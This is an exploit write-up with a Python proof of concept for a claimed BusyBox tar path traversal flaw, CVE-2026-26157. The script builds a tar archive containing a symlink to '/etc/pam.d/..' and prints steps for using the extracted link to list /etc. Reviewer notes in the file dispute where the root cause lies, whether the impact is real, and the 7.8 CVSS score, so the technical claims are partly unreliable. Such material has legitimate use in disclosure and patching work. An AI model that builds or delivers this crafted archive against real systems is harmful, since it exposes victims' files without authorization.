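# Exploit Title: BusyBox 1.37.0 - Path Traversal
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157
"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
BusyBox archive extraction utilities fail to properly sanitize symlink
targets containing trailing ".." components. The strip_unsafe_prefix()
function in archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../")
which only matches the 4-character pattern and misses 3-character
trailing "/.." sequences. This allows an attacker to craft malicious
archives with symlinks pointing to arbitrary filesystem locations,
enabling information disclosure through symlink traversal.

Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar

Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft

Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:

    cp2 = strstr(cp, "/../");   // Only matches "/../", misses "/pam.d/.."
    if (!cp2) break;

Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents

References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198

Reviewer notes (not verified against the BusyBox tree -- confirm before relying
on them):
- NOTE(review): strip_unsafe_prefix() is, to this reviewer's recollection, applied
  to archive entry *names*; symlink *targets* presumably go through
  unsafe_symlink_target() / create_or_remember_link(), which defer creation of
  absolute or ".."-containing targets until extraction has finished. Check which
  function actually sees the link target before attributing the behaviour.
- NOTE(review): a symlink whose target is an absolute path is also what GNU tar
  creates; the link grants the extracting user no access to /etc that it did not
  already have. The impact therefore hinges on a *more privileged* consumer later
  following the link, which this PoC does not demonstrate.
- NOTE(review): the CVSS vector printed by this script encodes I:H/A:H, while the
  impact described above is read-only disclosure. C:H/I:N/A:N would score 5.5,
  not 7.8 -- reconcile the two before publishing.
"""
import tarfile
import sys
import os

# Default output name kept for backward compatibility with the original script.
DEFAULT_EXPLOIT_FILE = 'CVE-2026-26157_exploit.tar'
# The ".." is the *last* path component, so the only separator sequence present
# is the 3-character "/.." -- strstr(target, "/../") therefore finds nothing.
DEFAULT_LINK_TARGET = '/etc/pam.d/..'
DEFAULT_LINK_NAME = 'sensitive_data'


def create_exploit(exploit_file=DEFAULT_EXPLOIT_FILE,
                   link_target=DEFAULT_LINK_TARGET,
                   link_name=DEFAULT_LINK_NAME):
    """Write a TAR archive holding a single symlink with an unsanitized target.

    Args:
        exploit_file: Path of the archive to create (default: the CVE-named file
            in the current directory, as in the original PoC).
        link_target: Symlink target stored in the archive. The default ends in
            "/.." so that a "/../"-only check does not match it.
        link_name: Name of the symlink entry inside the archive.

    Returns:
        ``exploit_file`` unchanged, once the archive has been written.

    Raises:
        SystemExit: with status 1 if the archive cannot be written.
    """
    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # A symlink entry carries no data; only type and linkname matter.
            info = tarfile.TarInfo(link_name)
            info.type = tarfile.SYMTYPE
            info.linkname = link_target
            tar.addfile(info)
    except (OSError, tarfile.TarError) as exc:
        # tarfile.open()/addfile() surface I/O and format problems as these two
        # families; anything else is a programming error and should propagate.
        print(f"[-] Error creating exploit: {exc}")
        sys.exit(1)

    # Absolute path so the printed command is valid whatever ``exploit_file``
    # was (the original hard-coded "../<file>", which only works for a bare
    # filename in the parent directory).
    archive_path = os.path.abspath(exploit_file)
    print(f"[+] Exploit created: {exploit_file}")
    print("\n[*] Exploitation steps:")
    print(" 1. mkdir test_extraction && cd test_extraction")
    print(f" 2. busybox tar xf {archive_path}")
    print(f" 3. readlink -f {link_name}")
    print(f" Expected output: {os.path.normpath(link_target)}")
    print(f" 4. ls {link_name}/")
    print(" Result: Lists /etc directory contents")
    print("\n[!] Impact: Arbitrary directory read via symlink traversal")
    # NOTE(review): I:H/A:H below does not match the read-only impact described
    # in this file; C:H/I:N/A:N scores 5.5. Left as published, flagged for review.
    print("[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
    return exploit_file


def show_technical_details():
    """Print the author's analysis of the claimed bypass to stdout.

    Output only; nothing is computed or returned. The function names and flow
    quoted here are the author's claims and are not checked by this script.
    """
    print("\n" + "=" * 70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("=" * 70)
    print("\nVulnerable Function:")
    print(" archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("\nVulnerable Code Pattern:")
    print(" cp2 = strstr(cp, \"/../\"); // Only matches 4-char sequence")
    print(" if (!cp2) break;")
    print("\nBypass Technique:")
    print(" Path: /etc/pam.d/..")
    print(" Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
    print(" Result: Sanitization bypassed, symlink created with original target")
    print("\nExploitation Flow:")
    print(" 1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print(" 2. get_header_tar() extracts symlink metadata")
    print(" 3. Symlink target NOT sanitized (bypass detected)")
    print(" 4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print(" 5. Target resolves: /etc/pam.d/.. -> /etc")
    print(" 6. Reading 'sensitive_data' = reading /etc")
    print("=" * 70 + "\n")


def main():
    """Entry point: print the analysis, write the archive, print mitigations."""
    print("=" * 70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("=" * 70)

    show_technical_details()
    create_exploit()

    print("\n[*] Mitigation:")
    print(" - Update BusyBox to patched version")
    print(" - Patch applies strip_unsafe_prefix() to symlink targets")
    print(" - Do not extract untrusted archives with elevated privileges")
    print("\n[*] For educational and authorized testing purposes only")


if __name__ == "__main__":
    main()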